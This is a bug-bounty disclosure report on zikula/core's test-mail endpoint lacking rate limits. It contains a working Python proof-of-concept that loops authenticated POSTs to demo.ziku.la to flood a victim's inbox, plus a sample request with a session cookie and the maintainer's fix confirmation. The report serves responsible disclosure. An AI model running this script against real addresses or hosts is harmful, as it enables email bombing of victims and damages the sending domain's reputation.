Insufficient Granularity of Access Control in zikula/core

Valid

Reported on

Jan 3rd 2022


Description

When sending test emails, you're able to spam a target email address with as many emails as an attacker wants to a victim's email address due to lack of rate limiting (/mailer/config/test) I've put together a simple Python script that exploits this and would allow you to send a custom amount of emails to any victim's email address.

Proof of Concept

# spammailer.py
# Example usage: python3 spammailer.py -csrf "JHja3y8NfO1LWy0UiJ4sC6NxzQoc064tCLQVko6PSj4" -cookie "sqrv94auln8thq23032rflgjc8" -subject "test" -message "test" -email "fuspehulmi@vusra.com"

import requests, argparse

def spammer(csrfToken, cookie, email, subject, message):
    data = {
        "zikulamailermodule_test[toName]": "Test",
        "zikulamailermodule_test[toAddress]": email,
        "zikulamailermodule_test[subject]": subject,
        "zikulamailermodule_test[messageType]": "text",
        "zikulamailermodule_test[bodyHtml]": "",
        "zikulamailermodule_test[bodyText]": message,
        "zikulamailermodule_test[test]": "",
        "zikulamailermodule_test[_token]": csrfToken
    }
    headers = {
    "Host": "demo.ziku.la",
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate, br",
    "Content-Type": "application/x-www-form-urlencoded",
    "Content-Length": str(len(data)),
    "Origin": "https://demo.ziku.la",
    "DNT": "1",
    "Connection": "keep-alive",
    "Referer": "https://demo.ziku.la/mailer/config/test",
    "Cookie": "_zsid=" + cookie,
    "Upgrade-Insecure-Requests": "1",
    "Sec-GPC": "1",
    "TE": "Trailers",
    "Pragma": "no-cache",
    "Cache-Control": "no-cache"}
    r = requests.post("https://demo.ziku.la/mailer/config/test", headers=headers, data=data)
    print(r.status_code)

parser = argparse.ArgumentParser()
parser.add_argument("-csrf", "--csrf-token", required=True, help="Your CSRF token.")
parser.add_argument("-cookie", "--cookie", required=True, help="Your session cookie")
parser.add_argument("-email", "--email", required=True, help="The victim email address")
parser.add_argument("-subject", "--subject", required=True, help="The subject line of the email")
parser.add_argument("-message", "--message", required=True, help="the message of the email")
arguments = parser.parse_args()

# Increase this number within parenthesis to increase the number of emails sent
for i in range(10):
    spammer(arguments.csrf_token, arguments.cookie, arguments.email, arguments.subject, arguments.message)

Request:

POST /mailer/config/test HTTP/1.1
Host: demo.ziku.la
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.ziku.la/mailer/config/test
Content-Type: application/x-www-form-urlencoded
Content-Length: 389
Origin: https://demo.ziku.la
DNT: 1
Connection: keep-alive
Cookie: _zsid=4pl4j2sj5m5ee4csbcsq9saqjh
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
Cache-Control: max-age=0

Impact

The impact of this will be negative on the targeted email address and also negative on the ziku.la domain (and other domains when the web application is hosted using another domain and emails are sent from a different domain) since it's possible that the victim would report the domain as a spam domain, resulting in a reputational damage to the domain.

We are processing your report and will contact the zikula/core team within 24 hours. 24 days ago
We have contacted a member of the zikula/core team and are waiting to hear back 23 days ago
Axel Guckelsberger validated this vulnerability 23 days ago
1d8 has been awarded the disclosure bounty
The fix bounty is now up for grabs
Axel Guckelsberger confirmed that a fix has been merged on 06dee1 23 days ago
The fix bounty has been dropped
Axel
23 days ago

Maintainer


Thanks for this report. Added rate limiting like you suggested. Note the fix is not applied to the demo page yet, as this is running an older version at the moment.